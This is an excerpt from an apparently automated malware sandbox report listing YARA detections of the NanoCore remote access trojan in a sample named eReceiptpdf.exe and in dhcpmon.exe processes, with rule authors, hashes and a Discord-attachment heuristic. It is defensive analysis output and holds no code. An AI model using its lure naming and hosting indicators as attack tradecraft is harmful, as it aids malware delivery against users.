      Source: 0.0.eReceiptpdf.exe.5144460.25.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 18.2.dhcpmon.exe.40e016e.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 12.2.dhcpmon.exe.4f77190.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 12.2.dhcpmon.exe.4f77190.9.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 18.2.dhcpmon.exe.40ea9e1.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 18.2.dhcpmon.exe.40e016e.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 18.2.dhcpmon.exe.40e016e.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.0.eReceiptpdf.exe.5144460.25.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.0.eReceiptpdf.exe.5144460.25.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 18.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 18.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.0.eReceiptpdf.exe.5144460.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.0.eReceiptpdf.exe.5144460.11.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 18.2.dhcpmon.exe.40ea9e1.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.0.eReceiptpdf.exe.5144460.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.0.eReceiptpdf.exe.5144460.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 18.2.dhcpmon.exe.40e4fab.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 18.2.dhcpmon.exe.40e4fab.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000000.00000000.300635347.0000000005144000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000000.00000000.300635347.0000000005144000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000000.00000000.324519764.00000000070F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000000.00000000.324519764.00000000070F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000000.00000000.303431509.00000000070F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000000.00000000.303431509.00000000070F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000012.00000002.351180873.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000012.00000002.351180873.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000C.00000002.341009071.0000000004F77000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000C.00000002.341009071.0000000004F77000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000012.00000002.352765466.0000000003091000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: eReceiptpdf.exe PID: 7124, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: eReceiptpdf.exe PID: 7124, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: dhcpmon.exe PID: 6428, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: dhcpmon.exe PID: 6428, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: dhcpmon.exe PID: 6048, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: dhcpmon.exe PID: 6048, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: eReceiptpdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: eReceiptpdf.exe, type: SAMPLEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
      Source: 18.2.dhcpmon.exe.30f9658.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 18.2.dhcpmon.exe.30f9658.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 18.2.dhcpmon.exe.30f9658.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 18.2.dhcpmon.exe.30f9658.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 18.2.dhcpmon.exe.30fe6b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 18.2.dhcpmon.exe.30fe6b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.2.dhcpmon.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
      Source: 12.2.dhcpmon.exe.4f77190.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 12.2.dhcpmon.exe.4f77190.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 12.2.dhcpmon.exe.4f77190.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 15.0.dhcpmon.exe.420000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
      Source: 0.0.eReceiptpdf.exe.dc0000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
      Source: 0.0.eReceiptpdf.exe.5144460.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.0.eReceiptpdf.exe.5144460.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.0.eReceiptpdf.exe.5144460.25.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.0.dhcpmon.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
      Source: 0.0.eReceiptpdf.exe.dc0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
      Source: 0.2.eReceiptpdf.exe.dc0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
      Source: 18.2.dhcpmon.exe.40e016e.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 18.2.dhcpmon.exe.40e016e.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 12.2.dhcpmon.exe.4f77190.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 12.2.dhcpmon.exe.4f77190.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 12.2.dhcpmon.exe.4f77190.9.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 15.2.dhcpmon.exe.420000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
      Source: 18.2.dhcpmon.exe.40ea9e1.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 18.2.dhcpmon.exe.40ea9e1.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 18.2.dhcpmon.exe.40e016e.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 18.2.dhcpmon.exe.40e016e.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 18.2.dhcpmon.exe.40e016e.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0.0.eReceiptpdf.exe.5144460.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.0.eReceiptpdf.exe.5144460.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.0.eReceiptpdf.exe.5144460.25.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 18.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 18.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 18.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.0.eReceiptpdf.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
      Source: 12.0.dhcpmon.exe.b30000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
      Source: 18.0.dhcpmon.exe.d40000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
      Source: 0.0.eReceiptpdf.exe.5144460.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.0.eReceiptpdf.exe.5144460.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.0.eReceiptpdf.exe.5144460.11.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 18.2.dhcpmon.exe.d40000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
      Source: 0.0.eReceiptpdf.exe.dc0000.15.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
      Source: 12.2.dhcpmon.exe.b30000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
      Source: 18.2.dhcpmon.exe.40ea9e1.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 18.2.dhcpmon.exe.40ea9e1.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.0.eReceiptpdf.exe.5144460.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.0.eReceiptpdf.exe.5144460.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.0.eReceiptpdf.exe.5144460.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 18.2.dhcpmon.exe.40e4fab.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 18.2.dhcpmon.exe.40e4fab.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 18.2.dhcpmon.exe.40e4fab.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000000.00000000.300635347.0000000005144000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000000.00000000.300635347.0000000005144000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000000.00000000.324519764.00000000070F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000000.00000000.324519764.00000000070F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000000.00000000.303431509.00000000070F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000000.00000000.303431509.00000000070F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000012.00000002.351180873.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000012.00000002.351180873.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
